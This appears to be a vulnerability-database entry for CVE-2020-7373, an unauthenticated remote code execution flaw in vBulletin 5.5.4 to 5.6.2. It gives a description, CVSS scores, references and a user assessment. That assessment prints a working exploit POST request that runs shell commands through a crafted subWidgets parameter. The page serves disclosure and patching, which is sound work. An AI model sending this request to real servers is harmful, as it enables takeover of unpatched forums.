Attacker Value

High

(1 user assessed)

Exploitability

Very High

(1 user assessed)

User Interaction

CVE-2020-7373

Disclosure Date: October 30, 2020 •

CVE-2020-7373 CVSS v3 Base Score: 9.8

MITRE ATT&CK

Add MITRE ATT&CK tactics and techniques that apply to this CVE.

Description

vBulletin 5.5.4 through 5.6.2 allows remote command execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759. ALSO NOTE: CVE-2020-7373 is a duplicate of CVE-2020-17496. CVE-2020-17496 is the preferred CVE ID to track this vulnerability.

Add Assessment

zeroSteiner (340)

August 13, 2020 9:24pm UTC (4 years ago)•Edited 4 years ago

Ratings

Attacker Value

High

Exploitability

Very High

Easy to weaponize Unauthenticated

Technical Analysis

This vulnerable allows an unauthenticated attacker to run arbitrary PHP code or operating system commands on affected versions of the vBulletin web application. The vulnerability, which was also discovered by Zenofex, is identified as CVE-2020-7373 and is effectively a bypass for a previously patched vulnerability identified as CVE-2019-16759. Administrators running vBulletin should patch this one immediately.

Example POST request that would trigger the vulnerability:

POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1
Host: 192.168.249.2
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded
Content-Length: 168

subWidgets%5b0%5d%5btemplate%5d=widget_php&subWidgets%5b0%5d%5bconfig%5d%5bcode%5d=echo%20shell_exec%28base64_decode%28%27ZWNobyB3elV4d2VJag%3d%3d%27%29%29%3b%20exit%3b

CVSS V3 Severity and Metrics

Data provided by the National Vulnerability Database (NVD)

Base Score:

9.8 Critical

Impact Score:

5.9

Exploitability Score:

3.9

Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Attack Vector (AV):

Network

Attack Complexity (AC):

Low

Privileges Required (PR):

None

User Interaction (UI):

None

Scope (S):

Unchanged

Confidentiality (C):

High

Integrity (I):

High

Availability (A):

High

Vendors

vbulletin

Products

vbulletin

References

Canonical

CVE-2020-7373 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7373)

Miscellaneous

https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/

https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4445227-vbulletin-5-6-0-5-6-1-5-6-2-security-patch

https://seclists.org/fulldisclosure/2020/Aug/5

https://github.com/rapid7/metasploit-framework/pull/13970

Rapid7

High

CVE-2020-7373

High

Very High

None

None

Network

CVE-2020-7373

Description

Add Assessment

Ratings

Technical Analysis

CVSS V3 Severity and Metrics

General Information

Vendors

Products

References

Canonical

Miscellaneous

Additional Info

Technical Analysis

High

CVE-2020-7373

High

Very High

None

None

Network

CVE-2020-7373

Description

Add Assessment

Ratings

Technical Analysis

CVSS V3 Severity and Metrics

General Information

Vendors

Products

References

Canonical

Miscellaneous

Additional Info

Technical Analysis

Quick Cookie Notification